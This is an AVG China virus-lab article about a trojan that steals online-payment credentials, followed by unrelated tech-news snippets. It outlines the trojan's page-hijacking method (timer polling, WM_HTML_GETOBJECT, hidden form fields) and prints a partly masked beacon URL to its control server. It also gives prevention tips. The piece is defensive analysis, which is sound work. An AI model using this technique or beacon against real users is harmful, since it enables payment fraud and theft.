网购“定时炸弹”隐匿待发,AVG升级防护全面抵御

  岁末将至,一年一度的促销狂潮也陆续到来,各大网购网站施展浑身解数来吸引客户。据最新数据显示:仅国内著名的网购平台淘宝在12月12日推出的全民疯抢活动,一个小时内,成交额就达到了4.75亿,成交量278万笔。令人眼花缭乱的促销手段吸引来的不仅是诸多的网购达人,更吸引了众多黑客的目光。在最近一段时间内,AVG中国病毒实验室截获大量针对国内各种支付平台的病毒,包括:百联,盛付通,快钱,讯付,易宝,支付宝等。同时针对的范围也有所扩大,除了网购网站之外,一些游戏公司的充值网站也在此类木马的攻击范围之列,如:完美,多玩,4399网络游戏,征途游戏等。此类木马大多是由某种生成器生成,并且木马的作者提供后台的管理系统。

  此类病毒的传播手段没有很明显的变化,大多还是利用社会工程学伪装成word文档,图片文件,或者文本文件,诱导用户点击。对于攻击的手段主要有窃取用户的支付账户的密码,修改用户的支付账户。下面让我们来近距离来接触此类木马,揭开它的神秘面纱。

  目前截获的一些样本中大多数具有word文档的图标。这类文件可能是以邮件附件的形式存在,也有可能是卖家发送产品信息。在运行过程中此类木马会首先连接到baidu,以确定当前的网络状况。然后连接到病毒后台的服务器。发出的请求的形式如下:

  http://119.***.***.48:858/Api/163/Post.Php?UserName=aucodehu&Bank=ICBC&Money=88(链接已经处理)

  通过以上用户名以及银行信息,可以进行管理和分赃。随后木马会简单的收集一下系统的信息然后发送到相同的后台系统。


  包括本机的ip,操作系统版本,以及地理位置。

  在进行完以上的准备活动后,此木马就开始监控用户的所浏览的网址,区别于以往的代码注入,或者劫持API之类的手法,此类木马使用了一种更为简便而且行之有效的方法:定时器。而这种手段可能被某些主动防御所忽略。此类木马一般设置了三个或以上的定时器。触发的时间间隔是200毫秒。这个时间间隔足以监控到用户对网站的操作。其中一个定时器,会通过GetCursorPos获得当前鼠标的位置,进而获得当前窗口的句柄。然后通过向Webbrowser控件(窗口类名是"Internet Explorer_Server")发一个WM_HTML_GETOBJECT的消息获得IHTMLDocument对象。获得此对象后,木马作者就可以对该页面进行任何操作:解析该页面元素,窃取自己感兴趣的任何内容,篡改支付信息等等,以下是在病毒中截取到的一个字符串的片段:


  同时也会在页面中添加一些属性为隐藏的标签,这些标签是不会显示在页面中,但是却是真正起作用的部分:


  一旦点击提交,这些页面中隐藏的内容将被提交,用户就会面临着信息失窃,财产损失。同时病毒还设置其它的定时器。用来关闭支付网站对用户环境检查的以及用户支付失败的页面。

  对于此类木马的防范,应该注意以下几点:

  1. 保持杀毒软件的及时更新。

  2. 不打开任何不是自己主动索取的文件。

  3. 检查文件的类型是否和图标以及后缀一致。

  4. 网购时如果发现任何用户支付环境检查的页面被关闭,立即停止支付。

  5. 检查支付页面是否被修改。

  AVG已经可以检测此类病毒,用户们只要不关闭更新,保持病毒库在当前最新状态,就可以有效阻止该木马的侵袭。同时,AVG中国实验室借此提醒广大网友,年底是各种网络病毒爆发的高危期,平时网上冲浪特别是涉及财产交易时一定要谨慎再谨慎。

时间: 2024-10-24 17:29:20

网购“定时炸弹”隐匿待发,AVG升级防护全面抵御的相关文章

绿盟发力DNS防护 全面布局域名安全

中介交易 SEO诊断 淘宝客 云主机 技术大厅 10月26日,绿盟科技(NSFOCUS)在北京举办了DNS域名安全防护产品新闻发布会.此次DNS域名防护专项产品的发布,标志着绿盟科技已经全面进入DNS域名安全领域.绿盟科技副总裁吴云坤出席此次会议,并做主题演讲.发布会吸引了众多知名IT媒体的参与和关注. 发布会现场 近年来,DNS域名已经成为整个互联网发展的基础服务,DNS域名安全逐渐成为网络安全的热点,对互联网的发展具有决定性影响.<中国域名服务及安全现状报告>中的一组数据表明,截至2010

微软3月初拟向用户发WindowsPhone升级信息

CNET科技资讯网2月22日国际报道 微软在公司Windows Phone博客上表示,将向Windows Phone 7手机发布两款软件升级信息,添加新功能.博客称:"Windows Phone第一款升级软件是提高软件升级过程. 尽管该升级似乎不太令人激动,但却非常重要,因为这将为手机升级'复制和粘贴或改进后的Marketplace搜索'等所有新功能铺平道路." 软件升级将于3月初开始,数月后添加多任务支持和改进后的浏览器等重大升级.为完成手机升级,用户需将手机与安装最新版Zune软件

易观智库发布网购监测新系统 助力产业升级

[TechWeb报道]9月19日消息,易观智库宣布旗下"中国网购商品行情系统"和"中国网购商品价格指数"两款系统正式上线,前者旨在帮助传统的品牌企业及时.准确的操控线上渠道,后者则能直观.客观的反应国民网购的兴趣和需求,提升传统品牌企业的线上产品定价权. 据了解,易观"中国网购商品行情系统"主要针对电商平台利用技术手段采集获取商品信息.价格信息.促销信息.成交量信息.用户评论信息以及物流覆盖信息,通过标准产品库及方法论体系分析整理成便于品牌产品企

微软发Mango升级版本4周完成98%用户升级

9月29日消息,微软Windows Phone事业部总裁Andy Lees昨日宣布推出原代号Mango的Windows Phone最新版本.微软在数月前首度推出了Windows Phone 7版本,昨日发布的7.5版本是基于"以人为本"的理念设计推出的,它提供了数百种新功能和新体验,如多任务处理.更多整合应用.卓越的移动互联网体验,以及包括整合社交网络和 对话方式等强大的个性化工具,帮助人们实现在日常生活中的互联互通. 微软公司Windows Phone事业部总裁Andy Lees表示

AVG 2012震撼上市:更轻、更快、更流畅

近日,AVG Technologies 正式宣布推出其市场领先的网络安全软件的最新版本--AVG 安全软件2012 版.据悉,AVG 2012增添了新的防护技术,改进了计算机性能并加快了下载速度,因此相比之前所有的AVG产品,AVG 2012更轻便.快捷且占用更小内存. "AVG不仅仅是一家杀毒软件公司,还是一个社群主导的.安全的数字生态系统,致力于帮助用户自我保护和保护他们最关心在意的东西.计算机和设备已延伸至每个人的工作与娱乐中.在当今世界,我们不单单只是防护机器.我们保护着人们的数字生活,

网购一周没到货快递变慢递

主要是因为适逢春运,外加天气差,我市一些快递公司下周起停止接件 本报讯 (记者 雍黎)春节临近,在网上购买年货的市民也越来越多,但许多市民发现,一些网店已经不发货了,而且收到货的速度也比以前慢了很多.昨日,记者从重庆多家快递公司了解到,从下周起,部分快递公司就不再接订单,想要网购或寄东西的市民最好本周内下订. 网上购物一周没收到货 在解放碑一公司上班的周小姐很郁闷,上周五她在网上购买了一副眼镜框, 卖家15日就寄出了,到现在都没收到.查询物流跟踪,她发现快递在广州入库后就没有进一步信息了.卖家解

企业微博运营规律-发博时间

研究说明 ●将企业发博的时间分布,和用户反馈量的时间分布进行比对,为企业更好的配置资源提供建议 ●需要特别说明的是,二者是互相影响的动态关系,需要经常查看更新.●指标说明 ◆为了剔除粉丝规模对于反馈数量的影响,用转发率和评论率代替转发量和评论量 ◆转发率=单帐号的转发数量/该帐号粉丝数量 ◆评论率=单帐号的评论数量/该帐号粉丝数量 ●数据采集方法: ◆企业整体样本量:120+ ◆各行业样本量:40-60 ◆数据采集区间:2个月 新浪微博企业发布信息总体规律 ●企业青睐周一,但用户在周三.周四更活

邮政"慢递"遭网友吐槽:网店再发EMS直接差评

中国经济网北京11月26日讯(记者 韩肖)近日,一场关于"让 EMS滚出快递届"的讨论话题引起了 网友的围观,无数网友对EMS配送商品的慢速大吐苦水,称其相比其他快递在配送时间上有很大差距,更有网友愤怒的表示,以后网购时店家只要发EMS,直接退货一星差评.现状:多数网友不满配送速度日前,有媒体报道称,在"双十一"之后,多数消费者都已经收获了自己的血拼成果,不过也有部分人由于快递不给力,至今没看到货.而在被吐槽的快递公司中,EMS占了大多数,而在微博上也出现了&quo

QQ网购和QQ商城合二为一:至少淘汰一半卖家

京东商城去年收入约为600亿元.苏宁易购152亿元.一号店68亿元.当当网52亿元,而腾讯电商只有44亿元,这与腾讯巨大的流量并不相称. 引发平台竞争更激烈 腾讯日前宣布对电商业务进行大调整,今日,腾讯电商旗下电商网站QQ网购.QQ商城合二为一,升级后的QQ网购将对入驻商家进行严格筛选,再度提高商家准入门槛,仅保留原有商家中约30%的最优质商家.完成本次整合后,易迅.QQ网购.拍拍网将成为腾讯电商的三极:易迅业务方向是B2C,类似京东:QQ网购业务方向是B2C开放平台,类似天猫:拍拍网业务方向是